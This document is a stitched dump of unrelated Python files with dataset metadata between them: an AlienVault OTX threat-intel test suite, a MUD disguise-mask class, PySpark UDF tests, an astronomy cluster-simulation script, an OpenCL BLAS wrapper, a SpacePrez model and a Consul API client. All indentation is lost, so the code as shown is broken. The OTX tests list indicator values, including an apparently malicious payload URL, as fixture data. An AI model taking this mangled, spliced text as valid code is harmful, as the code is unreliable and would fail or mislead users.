'expiration': None,
},
{
'indicator': 'efdd3ee0f816eba8ab1cba3643e42b40aaa16654d5120c67169d1b002e7f714d', # noqa: E501
'created': '1970-01-04T00:00:00',
'expiration': None,
},
{
'indicator': '172.16.58.3',
'created': '1970-01-05T00:00:00',
'expiration': '1970-01-06T00:00:00',
},
{
'indicator': '2001:14ba:1f00:0:1117:e76e:843d:f803',
'created': '1970-01-06T00:00:00',
'expiration': '1970-01-07T00:00:00',
},
{
'indicator': 'http://blockchains.pk/nw_NIHbAj35.bin',
'created': '1970-01-07T00:00:00',
'expiration': None,
},
]
for indicator in indicators:
indicator['pulse_key'] = pulse['id']
payload_list = []
for indicator_type in indicator_types:
payload_list.append({
'base_indicator': {
'type': indicator_type,
},
'pulse_info': {
'pulses': [pulse],
},
})
payload_list.append({
'next': None,
'results': indicators,
})
payload_list_iter = iter(payload_list)
mock_response.json = lambda: next(payload_list_iter)
return mock_response
@fixture(scope='module')
def expected_payload(any_route, client, valid_json):
app = client.application
payload = None
if any_route.startswith('/deliberate'):
payload = {}
if any_route.startswith('/observe'):
observable_types = {
'domain',
'md5',
'sha1',
'sha256',
'ip',
'ipv6',
'url',
}
observables = [
observable
for observable in valid_json
if observable['type'] in observable_types
]
count = len(observables)
start_times = [
f'1970-01-0{day}T00:00:00Z'
for day in range(1, count + 1)
]
observed_times = [
{'start_time': start_time}
for start_time in start_times
]
for observed_time in observed_times:
observed_time['end_time'] = observed_time['start_time']
valid_times = [
{'start_time': start_time}
for start_time in start_times
]
for index in range(count):
if observables[index]['type'] in ('ip', 'ipv6'):
day = index + 1
valid_times[index]['end_time'] = (
f'1970-01-0{day + 1}T00:00:00Z'
)
description = (
'This is simply the best pulse in the history of humankind!'
)
external_ids = ['q1w2e3r4t5y6']
producer = 'JoriQ'
short_description = description
source_uri = (
f"{app.config['AVOTX_URL'].rstrip('/')}/pulse/{external_ids[0]}"
)
tags = ['open', 'threat', 'exchange']
title = 'Best Pulse Ever'
tlp = 'white'
# Implement a dummy class initializing its instances
# only after the first comparison with any other object.
class LazyEqualizer:
NONE = object()
def __init__(self):
self.value = self.NONE
def __eq__(self, other):
if self.value is self.NONE:
self.value = other
return self.value == other
sighting_refs = [LazyEqualizer() for _ in range(count)]
indicator_refs = [LazyEqualizer() for _ in range(count)]
payload = {
'sightings': {
'count': count,
'docs': [
{
'description': description,
'external_ids': external_ids,
'id': sighting_ref,
'observables': [observable],
'observed_time': observed_time,
'source_uri': source_uri,
'title': title,
'tlp': tlp,
**Sighting.DEFAULTS
}
for sighting_ref, observable, observed_time
in zip(sighting_refs, observables, observed_times)
],
},
'indicators': {
'count': count,
'docs': [
{
'id': indicator_ref,
'external_ids': external_ids,
'producer': producer,
'short_description': short_description,
'source_uri': source_uri,
'tags': tags,
'title': title,
'tlp': tlp,
'valid_time': valid_time,
**Indicator.DEFAULTS
}
for indicator_ref, observable, valid_time
in zip(indicator_refs, observables, valid_times)
],
},
'relationships': {
'count': count,
'docs': [
{
'id': mock.ANY,
'source_ref': sighting_ref,
'target_ref': indicator_ref,
**Relationship.DEFAULTS
}
for sighting_ref, indicator_ref
in zip(sighting_refs, indicator_refs)
],
},
}
if any_route.startswith('/refer'):
observable_types = {
'domain': {'name': 'domain', 'category': 'domain'},
'email': {'name': 'email', 'category': 'email'},
'md5': {'name': 'MD5', 'category': 'file'},
'sha1': {'name': 'SHA1', 'category': 'file'},
'sha256': {'name': 'SHA256', 'category': 'file'},
'ip': {'name': 'IP', 'category': 'ip'},
'ipv6': {'name': 'IPv6', 'category': 'ip'},
'url': {'name': 'URL', 'category': 'url'},
}
payload = []
for observable in valid_json:
if observable['type'] not in observable_types:
continue
observable = {**observable, **observable_types[observable['type']]}
reference = {
'id': (
f"ref-avotx-search-{observable['type']}-"
f"{quote(observable['value'], safe='')}"
),
'title': f"Search for this {observable['name']}",
'description': (
f"Lookup this {observable['name']} on AlienVault OTX"
),
'url': (
f"{app.config['AVOTX_URL']}/indicator/"
f"{observable['category']}/"
f"{quote(observable['value'], safe='@:')}"
),
'categories': ['Search', 'AlienVault OTX'],
}
payload.append(reference)
assert payload is not None, f'Unknown route: {any_route}.'
return {'data': payload}
def test_enrich_call_success(any_route,
client,
valid_json,
mock_request,
valid_jwt,
expected_payload,
get_public_key):
app = client.application
response = None
if any_route.startswith('/deliberate'):
response = client.post(any_route)
if any_route.startswith('/observe'):
target = 'api.observables.ThreadPoolExecutor.map'
side_effect = map
with mock.patch(target, side_effect=side_effect):
mock_request.side_effect = (
[get_public_key] + [avotx_api_response(HTTPStatus.OK)] * 14
)
response = client.post(any_route,
json=valid_json,
headers=headers(valid_jwt()))
observable_types = {
'domain': 'domain',
'md5': 'file',
'sha1': 'file',
'sha256': 'file',
'ip': 'IPv4',
'ipv6': 'IPv6',
'url': 'url',
}
expected_urls = []
expected_headers = {
'User-Agent': app.config['CTR_USER_AGENT'],
'X-OTX-API-KEY': (
jwt.decode(
valid_jwt(), options={'verify_signature': False}
)['key']
),
}
expected_params_list = []
pulse_id = 'q1w2e3r4t5y6'
for observable in valid_json:
if observable['type'] not in observable_types:
continue
category = observable_types[observable['type']]
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/indicators/{category}/"
f"{quote(observable['value'], safe='@:')}/general"
)
expected_params_list.append({})
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/pulses/{pulse_id}/"
'indicators'
)
expected_params_list.append({
'sort': '-created',
'limit': mock.ANY,
'page': 1,
})
mock_request.assert_has_calls([
mock.call(expected_url,
headers=expected_headers,
params=expected_params)
for expected_url, expected_params
in zip(expected_urls, expected_params_list)
])
if any_route.startswith('/refer'):
response = client.post(any_route, json=valid_json)
assert response is not None, f'Unknown route: {any_route}.'
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
def test_enrich_call_with_external_error_from_avotx_failure(
avotx_api_route, client, valid_json, mock_request, valid_jwt,
get_public_key):
for status_code, error_code, error_message in [
(
HTTPStatus.FORBIDDEN,
'authorization error',
('Authorization failed: '
'Authorization failed on AlienVault OTX side'),
),
(
HTTPStatus.INTERNAL_SERVER_ERROR,
'oops',
'Something went wrong. Reason: '
f'{HTTPStatus.INTERNAL_SERVER_ERROR.value} '
f'{HTTPStatus.INTERNAL_SERVER_ERROR.phrase}.',
),
]:
app = client.application
mock_request.side_effect = [
get_public_key, avotx_api_response(status_code)
]
def shuffle(sequence):
return sample(sequence, len(sequence))
observables = shuffle(valid_json)
response = client.post(avotx_api_route,
json=observables,
headers=headers(valid_jwt()))
observable_types = {
'domain': 'domain',
'md5': 'file',
'sha1': 'file',
'sha256': 'file',
'ip': 'IPv4',
'ipv6': 'IPv6',
'url': 'url',
}
expected_headers = {
'User-Agent': app.config['CTR_USER_AGENT'],
'X-OTX-API-KEY': (
jwt.decode(
valid_jwt(), options={'verify_signature': False}
)['key']
),
}
expected_params = {}
expected_urls = []
for observable in valid_json:
if observable['type'] not in observable_types:
continue
category = observable_types[observable['type']]
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/indicators/{category}/"
f"{quote(observable['value'], safe='@:')}/general"
)
mock_request.assert_has_calls([
mock.call(expected_url,
headers=expected_headers,
params=expected_params)
for expected_url in expected_urls
], any_order=True)
mock_request.reset_mock()
expected_payload = {
'errors': [
{
'code': error_code,
'message': error_message,
'type': 'fatal',
}
]
}
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
| 2.34375
| 2
|
typeclasses/disguises/disguises.py
|
sgsabbage/arxcode
| 42
|
12780098
|
<gh_stars>10-100
"""
Disguises and Masks
"""
from typeclasses.wearable.wearable import Wearable, EquipError
from typeclasses.consumable.consumable import Consumable
from world.crafting.craft_data_handlers import MaskDataHandler
from evennia.utils.logger import log_file
class Mask(Wearable):
"""
Wearable mask that replaces name with 'Someone wearing <short desc> mask'.
Also grants a temp_desc. Charges equal to quality, loses a charge when worn.
"""
item_data_class = MaskDataHandler
def at_object_creation(self):
"""
Run at Wearable creation.
"""
self.is_worn = False
def at_post_remove(self, wearer):
"""Hook called after removing succeeds."""
self.remove_mask(wearer)
super(Mask, self).at_post_remove(wearer)
def at_pre_wear(self, wearer):
"""Hook called before wearing for any checks."""
super(Mask, self).at_pre_wear(wearer)
if self.item_data.quality_level == 0:
raise EquipError("needs repair")
def at_post_wear(self, wearer):
"""Hook called after wearing succeeds."""
self.log_mask(wearer)
self.wear_mask(wearer)
if wearer.item_data.additional_desc:
wearer.msg(
"{yYou currently have a +tempdesc set, which you may want to remove with +tempdesc.{n"
)
super(Mask, self).at_post_wear(wearer)
def log_mask(self, wearer):
"""Logging players using masks to keep track of shennigans"""
log_file(
f"{wearer} ({wearer.id}) put on {self} ({self.id})", "player_masks.log"
)
def wear_mask(self, wearer):
"""Change the visible identity of our wearer."""
wearer.db.mask = self
wearer.fakename = "Someone wearing %s" % self
wearer.temp_desc = self.item_data.mask_desc
def remove_mask(self, wearer):
"""Restore the visible identity of our wearer."""
wearer.attributes.remove("mask")
del wearer.fakename
del wearer.temp_desc
wearer.msg("%s is no longer altering your identity or description." % self)
class DisguiseKit(Consumable):
"""
morestoof
"""
def check_target(self, target, caller):
"""
Determines if a target is valid.
"""
from evennia.utils.utils import inherits_from
return inherits_from(target, self.valid_typeclass_path)
| 2.625
| 3
|
pysparktestingexample/tests/test_udf_dict_arg.py
|
zhangabner/pyspark-debug-test
| 0
|
12780099
|
<filename>pysparktestingexample/tests/test_udf_dict_arg.py
import pytest
import pyspark.sql.functions as F
from pyspark.sql.types import *
# @F.udf(returnType=StringType())
# def state_abbreviation(s, mapping):
# if s is not None:
# return mapping[s]
# def test_udf_dict_failure(spark):
# df = spark.createDataFrame([
# ['Alabama',],
# ['Texas',],
# ['Antioquia',]
# ]).toDF('state')
# mapping = {'Alabama': 'AL', 'Texas': 'TX'}
# df.withColumn('state_abbreviation', state_abbreviation(F.col('state'), spark.sparkContext.broadcast(mapping))).show()
# def working_fun(mapping_broadcasted):
# def f(x):
# return mapping_broadcasted.value.get(x)
# return F.udf(f)
# def test_udf_dict_working(spark):
# df = spark.createDataFrame([
# ['Alabama',],
# ['Texas',],
# ['Antioquia',]
# ]).toDF('state')
# mapping = {'Alabama': 'AL', 'Texas': 'TX'}
# b = spark.sparkContext.broadcast(mapping)
# df.withColumn('state_abbreviation', working_fun(b)(F.col('state'))).show()
### CODE FOR A SO QUESTION
# keyword_list= [
# ['union','workers','strike','pay','rally','free','immigration',],
# ['farmer','plants','fruits','workers'],
# ['outside','field','party','clothes','fashions']]
# def label_maker_topic(tokens, topic_words_broadcasted):
# twt_list = []
# for i in range(0, len(topic_words_broadcasted.value)):
# count = 0
# #print(topic_words[i])
# for tkn in tokens:
# if tkn in topic_words_broadcasted.value[i]:
# count += 1
# twt_list.append(count)
# return twt_list
# # def make_topic_word(topic_words):
# # return F.udf(lambda c: label_maker_topic(c, topic_words))
# def make_topic_word_better(topic_words_broadcasted):
# def f(c):
# return label_maker_topic(c, topic_words_broadcasted)
# return F.udf(f)
# def test_udf_list(spark):
# df = spark.createDataFrame([["union",], ["party",]]).toDF("tokens")
# b = spark.sparkContext.broadcast(keyword_list)
# df.withColumn("topics", make_topic_word_better(b)(F.col("tokens"))).show()
## CODE FOR THIS SO QUESTION: https://stackoverflow.com/questions/53052891/pass-a-dictionary-to-pyspark-udf
# def stringToStr_function(checkCol, dict1_broadcasted) :
# for key, value in dict1.iteritems() :
# if(checkCol != None and checkCol==key): return value
# stringToStr_udf = udf(stringToStr_function, StringType())
# def stringToStr(dict1_broadcasted):
# def f(x):
# return dict1_broadcasted.value.get(x)
# return F.udf(f)
# def test_fetch_from_dict(spark):
# df = spark.createDataFrame([["REQUEST",], ["CONFIRM",]]).toDF("status")
# df.show()
# b = spark.sparkContext.broadcast({"REQUEST": "Requested", "CONFIRM": "Confirmed", "CANCEL": "Cancelled"})
# df.withColumn(
# "new_col",
# stringToStr(b)(F.col("status"))
# ).show()
def add_descriptions(dict_b):
def f(x):
return dict_b.value.get(x)
return F.udf(f)
def test_add_descriptions(spark):
df = spark.createDataFrame([[1,], [2,], [3,]]).toDF("some_num")
dictionary= { 1:'A' , 2:'B' }
dict_b = spark.sparkContext.broadcast(dictionary)
df.withColumn(
"res",
add_descriptions(dict_b)(F.col("some_num"))
).show()
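# Note: wrapping the UDF in a closure over the broadcast handle, as in
# add_descriptions above, lets executors resolve values via dict_b.value instead
# of passing the plain dictionary as a UDF argument (the approach shown failing
# in the commented-out tests above).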
| 2.5
| 2
|
create_art_cluster_DAO.py
|
tbitsakis/astro_projects
| 2
|
12780100
|
<filename>create_art_cluster_DAO.py
#! /usr/bin/python
'''
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
PURPOSE:
The code creates artificial clusters from the theoretical isochrones of Bruzual&Charlot and
then saves a table that will be used as an input for DAOPHOT>addstar to create an artificial
image of a cluster.
INPUTS:
Provide the isochrone file and the path to that directory. Also the bands and the number of
stars.
OUTPUTS:
A table containing coordinates and magnitudes
DEPENDENCIES:
Numpy
HISTORY:
Created by: <NAME> (Instituto de Radioastronomia y Astrofisica/UNAM, Mexico)
MODIFICATIONS:
None
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
'''
import numpy as np
import sys, operator, time, glob
from math import pi, log, e
import random
import matplotlib.pyplot as plt
import cosmolopy.luminosityfunction as LumF
# #################################################################################################
# ################################### EDIT BELOW THIS POINT #######################################
# #################################################################################################
# ISOCHRONE FILE ==================================================================================
print ' '
IsochronesPath = "/Users/TB/Documents/Astro_Work/Studying_StarClusters/Data/LMC/Analysis/8_Fit_CMDs/all_isochrones/my_isoc_random_5k/"
IsochroneFile_B1 = input('Isochrone, 1-band (1:U, 2:B, 3:V, 4:I): ') # column that corresponds to 1-band
IsochroneFile_B2 = input('Isochrone, 2-band (1:U, 2:B, 3:V, 4:I): ') # column that corresponds to 2-band
DistModulus = 18.5 # Distance Modulus of our galaxy
IsochroneFile = raw_input('Please provide the desirable isochrone file: ')
numberStars = input('Please provide the number of stars in the artificial cluster: ')
imageSize = [200,200]
# =================================================================================================
print ' '
print '================================= Running ======================================'
# #################################################################################################
# ################################ DO NOT EDIT BELOW THIS POINT ###################################
# #################################################################################################
start_time = time.time()
# ##################### Retrieve all theoretical values from isochrones files #####################
isochrones_list = sorted(glob.glob(IsochronesPath))
B1_Total = []
B2_Total = []
ColmagTotal = []
dataIndex = []
IsochroneFile_path = IsochronesPath+IsochroneFile
B1, B2 = np.loadtxt(IsochroneFile_path, comments='#', unpack=True,
usecols=(IsochroneFile_B1,IsochroneFile_B2))
B1_Total = B1+DistModulus # Adding distance modulus to modify generic isochrone mags to desirable redshift
B2_Total = B2+DistModulus # Adding distance modulus to modify generic isochrone mags to desirable redshift
ColmagTotal.extend(B1-B2) # ISOCHRONE COLOUR - no need to add distance modulus
for i in range(len(B1_Total)):
dataIndex.append(i)
# # ############################### Create random catalog of N-stars ################################
indexList = random.sample(dataIndex,numberStars) # Randomly chooses numberStars elements from the dataIndex array
B2_artStar = np.take(B2_Total,indexList) # Chooses the B2 with corresponding index
Col_artStar = np.take(ColmagTotal,indexList) # Chooses the Colour with corresponding index
mu = [imageSize[0]/2.,imageSize[1]/2.] # mean value of the two axis of image
sigma = imageSize[0]/8. # sigma value (the smallest axis fraction)
PosX=[]
PosY=[]
for i in range(numberStars):
PosX.append(random.gauss(mu[0],sigma)) # gaussian random for x
PosY.append(random.gauss(mu[1],sigma)) # gaussian random for y
# ######################################## Saving Results ###########################################
if IsochroneFile_B1 == 1 and IsochroneFile_B2 == 2:
filt = 'UB'
elif IsochroneFile_B1 == 1 and IsochroneFile_B2 == 3:
filt = 'UV'
elif IsochroneFile_B1 == 2 and IsochroneFile_B2 == 3:
filt = 'BV'
elif IsochroneFile_B1 == 3 and IsochroneFile_B2 == 4:
filt = 'VI'
else:
filt = 'NaN'
print 'Saving Results!'
save_file = 'Artificial_Clusters/'+IsochroneFile+'_'+filt+'_'+str(numberStars)+'_clust.cat'
file = open(save_file,'w')
file.write('# x_pixel y_pixel Mag '+filt+'\n')
for i1, i2, i3, i4 in zip(PosX,PosY,B2_artStar,Col_artStar):
    file.write('{} {} {} {}\n'.format(i1,i2,i3,i4))
file.close()
# ################################# Plotting the Luminosity Function ################################
print 'Plotting!'
plt.figure(1)
area = (22.-B2_artStar)*5
plt.scatter(PosX,PosY,s=area)
# plt.plot(x_s,y_s,label="Schechter function")
plt.xlim(0,imageSize[0])
plt.ylim(0,imageSize[1])
# # plt.yscale('log', nonposy='clip')
plt.xlabel('x [pixel]',fontsize=16)
plt.ylabel('y [pixel]',fontsize=16)
# plt.legend()
name_eps = 'Artificial_Clusters/'+IsochroneFile+'_'+filt+'_'+str(numberStars)+'_clust.eps'
plt.savefig(name_eps,format='eps')
# Plotting the CMD
plt.figure(2)
plt.scatter(Col_artStar,B2_artStar)
plt.xlabel(filt,fontsize=16)
plt.ylabel('m [mag]',fontsize=16)
plt.ylim(22,13)
plt.show()
print '================================== END ========================================'
print("--- %s seconds ---" % (time.time() - start_time))
print ' '
| 3.09375
| 3
|
output/models/ms_data/particles/particles_ec020_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12780101
|
from output.models.ms_data.particles.particles_ec020_xsd.particles_ec020 import Doc
__all__ = [
"Doc",
]
| 0.996094
| 1
|
veles/ocl_blas.py
|
AkshayJainG/veles
| 1,007
|
12780102
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Apr 13, 2015
BLAS class to use with ocl backend.
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
from cuda4py.blas import CUBLAS_OP_N, CUBLAS_OP_T
import numpy
import opencl4py.blas as clblas
import os
import threading
import weakref
from zope.interface import implementer
from veles.accelerated_units import AcceleratedUnit, IOpenCLUnit
from veles.config import root
from veles.dummy import DummyWorkflow
from veles.logger import Logger
from veles.numpy_ext import roundup
@implementer(IOpenCLUnit)
class Builder(AcceleratedUnit):
"""Dummy unit for building OpenCL kernels.
"""
def __init__(self, workflow, **kwargs):
super(Builder, self).__init__(workflow, **kwargs)
self.source = kwargs["source"]
self.defines = kwargs["defines"]
self.kernel_name = kwargs["kernel_name"]
self.cache_file_name = kwargs["cache_file_name"]
self.dtype = kwargs["dtype"]
@property
def kernel(self):
return self._kernel_
def ocl_init(self):
self.sources_[self.source] = {}
self.build_program(self.defines, self.cache_file_name, self.dtype)
self.assign_kernel(self.kernel_name)
def ocl_run(self):
pass
class OCLBLAS(Logger):
"""Class with BLAS functionality similar to CUBLAS.
It uses CLBLAS when available or custom kernels otherwise.
"""
@staticmethod
def attach_to_device(device):
if device.blas is None:
device.blas = OCLBLAS(device)
def __init__(self, device):
super(OCLBLAS, self).__init__()
self._lock_ = threading.Lock()
self._device = weakref.ref(device)
self.kernels = {}
self._const_i = numpy.zeros(3, dtype=numpy.uint64)
try:
if (root.common.engine.ocl.clBLAS is not True or
root.common.engine.precision_level > 0):
raise ValueError()
if "CLBLAS_STORAGE_PATH" not in os.environ:
found = False
for dirnme in root.common.engine.device_dirs:
for path, _, files in os.walk(dirnme):
for f in files:
if f.endswith(".kdb"):
found = True
os.environ["CLBLAS_STORAGE_PATH"] = path
break
if found:
break
if found:
break
self.blas = clblas.CLBLAS()
self._sgemm = self.clblas_sgemm
self._dgemm = self.clblas_dgemm
self.debug("Using clBLAS for matrix multiplication")
except (OSError, RuntimeError, ValueError):
self._sgemm = self.veles_gemm
self._dgemm = self.veles_gemm
self.debug("Using Veles OpenCL kernels for matrix multiplication")
@property
def device(self):
return self._device()
@staticmethod
def gemm(dtype):
if dtype == numpy.float32:
return OCLBLAS.sgemm
if dtype == numpy.float64:
return OCLBLAS.dgemm
raise ValueError("Invalid dtype %s" % dtype)
def sgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
return self._sgemm(
transA, transB, rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def dgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
return self._dgemm(
transA, transB, rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def clblas_sgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using clBLAS.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
Single precision (float) version.
"""
self.blas.sgemm((self.device.queue_,), clblas.clblasColumnMajor,
transA, transB, rowsCountA, columnCountB,
commonSideLength, alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def clblas_dgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using clBLAS.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
Double precision (double) version.
"""
self.blas.dgemm((self.device.queue_,), clblas.clblasColumnMajor,
transA, transB, rowsCountA, columnCountB,
commonSideLength, alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def veles_gemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using custom kernel.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
"""
with self._lock_:
self._veles_gemm(transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA, offsetB, offsetC)
def _veles_gemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA, offsetB, offsetC):
dtype = alpha.dtype
key = (transA, transB, rowsCountA, columnCountB, commonSideLength,
dtype)
krn_info = self.kernels.get(key)
if krn_info is None:
block_size, vector_opt = self.device.device_info.get_kernel_bs_vo(
kernel="matrix_multiplication", dtype=dtype)
defines = {
"BLOCK_SIZE": block_size,
"VECTOR_OPT": int(bool(vector_opt)),
"B_WIDTH": rowsCountA,
"A_WIDTH": columnCountB,
"AB_COMMON": commonSideLength
}
if transB == CUBLAS_OP_T:
defines["A_COL"] = 1
else:
assert transB == CUBLAS_OP_N
if transA == CUBLAS_OP_N:
defines["B_COL"] = 1
else:
assert transA == CUBLAS_OP_T
global_size = (roundup(rowsCountA, block_size),
roundup(columnCountB, block_size))
local_size = (block_size, block_size)
w = DummyWorkflow()
builder = Builder(
w, source="gemm", defines=defines, kernel_name="gemm",
cache_file_name=(
"veles_gemm_%s" % "_".join(str(x) for x in key)),
dtype=dtype)
builder.initialize(self.device)
krn_info = (builder.kernel, global_size, local_size)
self.kernels[key] = krn_info
del builder
del w
# Set the constants and execute the kernel
krn = krn_info[0]
self._const_i[0:3] = offsetA, offsetB, offsetC
# Our kernel stores output in row-major order, so swap A and B
krn.set_args(B, A, C, alpha, beta, self._const_i[1:2],
self._const_i[0:1], self._const_i[2:3])
global_size = krn_info[1]
local_size = krn_info[2]
self.device.queue_.execute_kernel(krn, global_size, local_size,
need_event=False)
| 1.734375
| 2
|
prez/models/spaceprez/spaceprez_feature_collection_list.py
|
surroundaustralia/Prez
| 2
|
12780103
|
from typing import List
class SpacePrezFeatureCollectionList(object):
def __init__(self, sparql_response: List) -> None:
self.dataset = {
"id": None,
"title": None
}
self.members = []
for result in sparql_response:
if self.dataset["id"] is None:
self.dataset["id"] = result["d_id"]["value"]
if self.dataset["title"] is None:
self.dataset["title"] = result["d_label"]["value"]
self.members.append({
"uri": result["coll"]["value"],
"title": result["label"]["value"],
"id": result["id"]["value"],
"desc": result["desc"].get("value") if result.get("desc") else None,
"link": f"/dataset/{self.dataset['id']}/collections/{result.get('id').get('value')}",
"members": f"/dataset/{self.dataset['id']}/collections/{result.get('id').get('value')}/items",
})
self.members.sort(key=lambda m: m["title"])
def get_feature_collection_flat_list(self):
feature_collection_list = []
for mem in self.members:
feature_collection_list.append(
{
"uri": mem["uri"],
"prefLabel": mem["title"],
}
)
return sorted(feature_collection_list, key=lambda c: c["prefLabel"])
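# Minimal usage sketch (illustrative; rows mirror the keys read above):
# rows = [{"d_id": {"value": "ds1"}, "d_label": {"value": "Dataset 1"},
#          "coll": {"value": "https://example.org/fc/1"},
#          "label": {"value": "Feature Collection 1"}, "id": {"value": "fc1"}}]
# fc_list = SpacePrezFeatureCollectionList(rows)
# fc_list.members[0]["link"]  # -> "/dataset/ds1/collections/fc1"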
| 2.546875
| 3
|
agent/consul_api.py
|
Suremaker/consul-deployment-agent
| 6
|
12780104
|
# Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
import base64, json, logging, requests
from retrying import retry
class ConsulError(RuntimeError):
pass
def handle_connection_error(func):
def handle_error(*args, **kwargs):
try:
return func(*args, **kwargs)
except requests.exceptions.ConnectionError as e:
logging.exception(e)
raise ConsulError('Failed to establish connection with Consul HTTP API. Check that Consul agent is running.')
return handle_error
def retry_if_connection_error(exception):
return isinstance(exception, requests.exceptions.ConnectionError)
class ConsulApi(object):
def __init__(self, consul_config):
self._config = consul_config
self._base_url = '{0}://{1}:{2}/{3}'.format(self._config['scheme'], self._config['host'], self._config['port'], self._config['version'])
self._last_known_modify_index = 0
@handle_connection_error
@retry(retry_on_exception=retry_if_connection_error, wait_exponential_multiplier=1000, wait_exponential_max=60000)
def _api_get(self, relative_url):
url = '{0}/{1}'.format(self._base_url, relative_url)
logging.debug('Consul HTTP API request: {0}'.format(url))
response = requests.get(url, headers={'X-Consul-Token': self._config['acl_token']})
logging.debug('Response status code: {0}'.format(response.status_code))
logging.debug('Response content: {0}'.format(response.text))
if response.status_code == 500:
raise ConsulError('Consul HTTP API internal error. Response content: {0}'.format(response.text))
return response
@handle_connection_error
@retry(retry_on_exception=retry_if_connection_error, wait_exponential_multiplier=1000, wait_exponential_max=60000)
def _api_put(self, relative_url, content):
url = '{0}/{1}'.format(self._base_url, relative_url)
logging.debug('Consul HTTP API PUT request URL: {0}'.format(url))
logging.debug('Consul HTTP API PUT request content: {0}'.format(content))
response = requests.put(url, data=content, headers={'X-Consul-Token': self._config['acl_token']})
logging.debug('Response status code: {0}'.format(response.status_code))
logging.debug('Response content: {0}'.format(response.text))
if response.status_code == 500:
raise ConsulError('Consul HTTP API internal error. Response content: {0}'.format(response.text))
return response
@retry(wait_fixed=5000, stop_max_attempt_number=12)
def _get_modify_index(self, key, for_write_operation):
logging.debug('Retrieving Consul key-value store modify index for key: {0}'.format(key))
response = self._api_get('kv/{0}?index'.format(key))
# For new values modify_index == 0
if response.status_code == 404 and for_write_operation == True:
modify_index = 0
else:
modify_index = response.headers.get('X-Consul-Index')
logging.debug('Consul key-value store modify index for key \'{0}\': {1}'.format(key, modify_index))
return modify_index
def check_connectivity(self):
logging.info('Checking Consul HTTP API connectivity')
self._api_get('agent/self')
logging.info('Consul HTTP API connectivity OK ')
def get_keys(self, key_prefix):
def decode():
return response.json()
def not_found():
logging.warning('Consul key-value store does not contain key prefix \'{0}\''.format(key_prefix))
return []
response = self._api_get('kv/{0}?keys'.format(key_prefix))
cases = {200: decode, 404: not_found}
return cases[response.status_code]()
def get_service_catalogue(self):
response = self._api_get('agent/services')
return response.json()
def get_value(self, key):
def decode():
values = response.json()
for value in values:
value['Value'] = json.loads(base64.b64decode(value['Value']))
return values[0].get('Value')
def not_found():
logging.warning('Consul key-value store does not contain a value for key \'{0}\''.format(key))
return None
response = self._api_get('kv/{0}'.format(key))
cases = {200: decode, 404: not_found}
return cases[response.status_code]()
def key_exists(self, key):
return self.get_value(key) is not None
def deregister_check(self, id):
response = self._api_put('agent/check/deregister/{0}'.format(id), {})
return response.status_code == 200
def register_http_check(self, service_id, id, name, url, interval, tls_skip_verify=False):
response = self._api_put('agent/check/register', json.dumps({'ServiceID': service_id, 'ID': id, 'Name': name, 'HTTP': url, 'TLSSkipVerify': tls_skip_verify, 'Interval': interval}))
return response.status_code == 200
def register_script_check(self, service_id, id, name, script_path, interval):
response = self._api_put('agent/check/register', json.dumps({'ServiceID': service_id, 'ID': id, 'Name': name, 'Script': script_path, 'Interval': interval}))
return response.status_code == 200
def register_service(self, id, name, address, port, tags):
response = self._api_put('agent/service/register', json.dumps({'ID': id, 'Name': name, 'Address': address, 'Port': port, 'Tags': tags}))
return response.status_code == 200
def wait_for_change(self, key_prefix):
modify_index = self._get_modify_index(key_prefix, False)
if modify_index is None:
self._last_known_modify_index = modify_index
#raise ConsulError('Modify index is invalid.')
if self._last_known_modify_index is None:
logging.info('There may be changes that have not been processed yet, skipping blocking query.')
self._last_known_modify_index = modify_index
return
self._last_known_modify_index = modify_index
